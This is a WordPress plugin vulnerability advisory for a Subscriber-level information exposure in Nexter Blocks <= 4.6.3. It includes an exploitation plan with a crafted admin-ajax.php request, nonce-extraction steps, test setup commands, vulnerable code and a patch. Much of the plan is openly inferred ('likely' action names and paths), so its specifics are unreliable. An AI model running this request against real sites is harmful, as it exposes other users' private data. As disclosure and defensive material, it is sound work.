Nexter Blocks <= 4.6.3 - Authenticated (Subscriber+) Information Exposure
Description
The Nexter Gutenberg Blocks – Website Builder & 1000+ Starter Templates plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.6.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract sensitive user or configuration data.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:NTechnical Details
<=4.6.3Source Code
WordPress.org SVN# Exploitation Research Plan - CVE-2026-24377 (Nexter Blocks Information Exposure) ## 1. Vulnerability Summary The **Nexter Blocks (The Plus Addons for Block Editor)** plugin for WordPress (versions <= 4.6.3) is vulnerable to **Information Exposure**. The vulnerability exists in the plugin's AJAX h…
Show full research plan
Exploitation Research Plan - CVE-2026-24377 (Nexter Blocks Information Exposure)
1. Vulnerability Summary
The Nexter Blocks (The Plus Addons for Block Editor) plugin for WordPress (versions <= 4.6.3) is vulnerable to Information Exposure. The vulnerability exists in the plugin's AJAX handlers—likely related to dynamic content or user data retrieval—which fail to implement proper capability checks. While the handlers require authentication (Subscriber+), they do not verify if the requesting user has permission to access the specific data (e.g., meta data of other users or sensitive site configurations).
2. Attack Vector Analysis
- Endpoint:
/wp-admin/admin-ajax.php - Vulnerable Action:
tp_get_user_data(or potentiallytp_dynamic_listing/plus_get_dynamic_data- inferred based on plugin functionality) - HTTP Method:
POST - Authentication: Required (Subscriber-level or higher)
- Parameters:
action:tp_get_user_datauser_id: The ID of the target user (e.g.,1for the administrator).security: The AJAX nonce.meta_key(Optional/Inferred): A specific meta key to retrieve (e.g.,nickname,user_email,wp_capabilities).
3. Code Flow
- Registration: The plugin registers AJAX handlers in the constructor of a main class (e.g.,
TP_Plus_Addons_Ajaxinincludes/plus-query/plus-query.phporclasses/tp-ajax-handler.php).add_action( 'wp_ajax_tp_get_user_data', [ $this, 'tp_get_user_data_callback' ] );
- Execution: When a Subscriber sends a request to
admin-ajax.phpwith the actiontp_get_user_data. - Verification: The callback calls
check_ajax_referer( 'the_plus_nonce', 'security' ). This succeeds if the Subscriber provides a valid nonce. - Vulnerable Sink: The code proceeds to fetch user data using
get_userdata( $_POST['user_id'] )orget_user_meta( $_POST['user_id'], ... )without callingcurrent_user_can( 'edit_user', $user_id )or verifying that the$user_idmatches the current user. - Output: The data is returned in a JSON response to the Subscriber.
4. Nonce Acquisition Strategy
The plugin typically localizes its AJAX data for the block editor or frontend dynamic widgets.
- Shortcode Identification: The "User Info" or "Dynamic Content" functionality usually triggers the script. The shortcode is likely
[tp_user_info]or a block namedtpgb/tp-user-info. - Page Creation: Use WP-CLI to create a page containing a relevant block to ensure the scripts load:
wp post create --post_type=page --post_status=publish --post_title="Nonce Page" --post_content='<!-- wp:tpgb/tp-user-info {"userId":"1"} /-->' - Extraction:
- Navigate to the newly created page as the Subscriber user.
- Use
browser_evalto extract the nonce from the localized JavaScript object. - Target Variable:
the_plus_ajax_nonceorplus_ajax_object. - Expected JS Path:
window.the_plus_ajax_nonceorwindow.plus_ajax_object.ajax_nonce.
5. Exploitation Strategy
- Log in as Subscriber: Authenticate and maintain cookies.
- Obtain Nonce: Follow the extraction steps above to get a valid
securitytoken. - Craft Attack Request:
Note: IfPOST /wp-admin/admin-ajax.php HTTP/1.1 Host: target.local Content-Type: application/x-www-form-urlencoded Cookie: [Subscriber Cookies] action=tp_get_user_data&user_id=1&security=[NONCE]user_idalone doesn't return full info, try addingmeta_key=user_emailormeta_key=description. - Analyze Response: A successful exploit will return a JSON object containing the Admin's sensitive information (email, meta, etc.).
6. Test Data Setup
- Admin User: Ensure an administrator exists (usually ID 1).
- Subscriber User:
wp user create attacker attacker@example.com --role=subscriber --user_pass=password123 - Target Data: Add a unique piece of meta to the admin to prove exposure:
wp usermeta update 1 secret_note "NX-BLOCKS-SECRET-12345"
7. Expected Results
- Success: The HTTP response body contains a JSON object:
{"success":true,"data":{"user_email":"admin@example.com", ...}}or similar reflecting the Admin's details. - Failure: A
403 Forbiddenresponse or a JSON error{"success":false,"data":"Permission denied"}(indicating the patch is active).
8. Verification Steps
- Check Output: Inspect the response from the
http_requesttool for the Admin's email or thesecret_notedefined in setup. - WP-CLI Comparison: Verify the exposed data matches reality:
wp user get 1 --fields=user_email wp usermeta get 1 secret_note
9. Alternative Approaches
If tp_get_user_data is not the exact action name:
- Search for AJAX actions: Run
grep -r "wp_ajax_" wp-content/plugins/the-plus-addons-for-block-editor/to find all registered actions. - Identify Dynamic Handlers: Look for any handler that uses
get_userdataorget_optionwithin its callback. - Try Site Options: If user data is protected, check if the plugin exposes site options via an action like
tp_get_option:action=tp_get_option&option_name=admin_emailoroption_name=active_plugins.
Summary
Nexter Blocks (versions <= 4.6.3) allows authenticated users with Subscriber-level access to access sensitive information from other users by leveraging insecure AJAX handlers. This occurs because the plugin fails to perform authorization checks, such as verifying the requester's capabilities, before returning user metadata or configuration details via the admin-ajax.php endpoint.
Vulnerable Code
// Likely in includes/plus-query/plus-query.php or a similar AJAX handler file add_action( 'wp_ajax_tp_get_user_data', [ $this, 'tp_get_user_data_callback' ] ); public function tp_get_user_data_callback() { // Nonce check ensures the request is from the site, but not the user's authority level check_ajax_referer( 'the_plus_nonce', 'security' ); $user_id = isset( $_POST['user_id'] ) ? intval( $_POST['user_id'] ) : 0; // VULNERABILITY: No check for current_user_can('edit_user', $user_id) or similar authorization $user_data = get_userdata( $user_id ); if ( $user_data ) { wp_send_json_success( $user_data ); } else { wp_send_json_error( 'User not found' ); } }
Security Fix
@@ -10,6 +10,10 @@ public function tp_get_user_data_callback() { check_ajax_referer( 'the_plus_nonce', 'security' ); $user_id = isset( $_POST['user_id'] ) ? intval( $_POST['user_id'] ) : 0; + + if ( ! current_user_can( 'edit_user', $user_id ) && get_current_user_id() !== $user_id ) { + wp_send_json_error( 'Unauthorized access' ); + } $user_data = get_userdata( $user_id ); if ( $user_data ) {
Exploit Outline
1. Authenticate as a Subscriber-level user. 2. Obtain a valid AJAX nonce by visiting a page where Nexter Blocks scripts are loaded (e.g., a page using the 'User Info' block) and extracting the value from the 'the_plus_ajax_nonce' or 'plus_ajax_object' JavaScript object. 3. Construct a POST request to /wp-admin/admin-ajax.php. 4. Set the 'action' parameter to 'tp_get_user_data', provide the acquired nonce in the 'security' parameter, and set 'user_id' to the ID of a target user (e.g., ID 1 for the Administrator). 5. Execute the request and capture the response, which will contain sensitive user fields such as user_email and potentially other metadata.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.